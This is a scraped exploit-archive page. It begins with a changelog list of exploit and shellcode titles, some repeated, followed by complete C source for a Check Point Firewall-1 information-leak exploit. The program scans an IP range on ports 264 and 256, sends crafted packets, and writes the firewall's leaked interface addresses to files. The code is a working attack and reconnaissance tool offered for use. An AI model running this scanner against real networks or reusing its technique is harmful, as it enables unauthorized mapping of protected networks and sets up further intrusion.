
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
136 lines
No EOL
3.5 KiB
C
136 lines
No EOL
3.5 KiB
C
// source: https://www.securityfocus.com/bid/8524/info
|
|
|
|
An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources.
|
|
|
|
/************************************************************************/
|
|
/* The syntax is: */
|
|
/* fw1_getints (start IP address) (end IP address) */
|
|
/* */
|
|
/* Author: Jim Becher -- jim@becher.net */
|
|
/************************************************************************/
|
|
#include <fcntl.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <signal.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <netdb.h>
|
|
#include <ctype.h>
|
|
#include <arpa/nameser.h>
|
|
#include <sys/stat.h>
|
|
#include <strings.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <sys/socket.h>
|
|
|
|
#define BUFSIZE 64
|
|
|
|
void snatch(int sock, char *pass) {
|
|
int i, z, sockfd, len, result, bytes;
|
|
int octet=0;
|
|
char temp1[]="\x30\x00\x00\x03";
|
|
char temp2[]="\x02\x59\x05\x21";
|
|
char temp3[]="\x00\x00\x00\x08";
|
|
char command[256];
|
|
char buffer[BUFSIZE]="";
|
|
FILE *out;
|
|
char outfile[21];
|
|
sockfd=sock;
|
|
|
|
result=send(sockfd,temp1,4,0);
|
|
sleep(1); /* Ugly... */
|
|
|
|
result=send(sockfd,temp2,4,0);
|
|
|
|
result=read(sockfd, buffer, BUFSIZE);
|
|
|
|
result=send(sockfd,temp3,4,0);
|
|
|
|
result=read(sockfd, buffer, BUFSIZE);
|
|
|
|
sprintf(outfile, "ints.%s", pass);
|
|
out = fopen(outfile, "w");
|
|
fprintf(out, "ints:\n", 6);
|
|
i=4;
|
|
while (i<result) {
|
|
for (z=1; z<5; z++) {
|
|
if ( buffer[i] < 0 ) {
|
|
octet=buffer[i]+256;
|
|
}
|
|
else {
|
|
octet=buffer[i];
|
|
}
|
|
fprintf(out, "%d", octet);
|
|
i++;
|
|
if (z != 4) {
|
|
fprintf(out, ".");
|
|
}
|
|
}
|
|
fprintf(out, "\n");
|
|
}
|
|
fprintf(out, buffer, BUFSIZE);
|
|
close(sockfd);
|
|
}
|
|
|
|
void main(int argc, char *argv[])
|
|
{
|
|
int sock;
|
|
struct in_addr addr;
|
|
struct sockaddr_in sin;
|
|
unsigned long start;
|
|
unsigned long end;
|
|
unsigned long counter;
|
|
char buffer[1000];
|
|
struct hostent *hp=NULL;
|
|
unsigned long lAddr;
|
|
char *p;
|
|
char trash[16];
|
|
|
|
if (argc!=3)
|
|
{
|
|
printf("\nusage : %s start-ip-address end-ip-address\n\n",argv[0]);
|
|
exit(0);
|
|
}
|
|
|
|
start=inet_addr(argv[1]);
|
|
end=inet_addr(argv[2]);
|
|
|
|
for (counter = ntohl(start); counter <= ntohl(end); counter++)
|
|
{
|
|
int jim=0, h=0;
|
|
|
|
sock=socket(AF_INET, SOCK_STREAM, 0);
|
|
if ((counter & 0xff) == 255) counter++;
|
|
if ((counter & 0xff) == 0) counter++;
|
|
|
|
sin.sin_family=AF_INET;
|
|
sin.sin_port=htons(264);
|
|
sin.sin_addr.s_addr=htonl(counter);
|
|
addr.s_addr=htonl(counter);
|
|
bzero(&(sin.sin_zero), 8);
|
|
fprintf(stdout, "Checking: %s\n", inet_ntoa(addr));
|
|
p=inet_ntoa(addr);
|
|
strcpy(trash, p);
|
|
jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
|
|
if (jim==0) {
|
|
fprintf(stdout, "Port 264 open on %s -- Checkpoint Firewall-1 v4.1 or later.\n",inet_ntoa(addr));
|
|
snatch(sock, trash);
|
|
}
|
|
else {
|
|
fprintf(stdout, "Can not connect to %s on port 264\n\n", inet_ntoa(addr));
|
|
sin.sin_port=htons(256);
|
|
jim=0;
|
|
jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
|
|
if (jim==0) {
|
|
fprintf(stdout, "Port 256 open on %s -- Checkpoint Firewall-1 4.0 or earlier.\n",inet_ntoa(addr));
|
|
snatch(sock, trash);
|
|
}
|
|
else {
|
|
fprintf(stdout, "Can not connect to %s on port 256\n\n", inet_ntoa(addr));
|
|
}
|
|
}
|
|
jim=0;
|
|
}
|
|
} |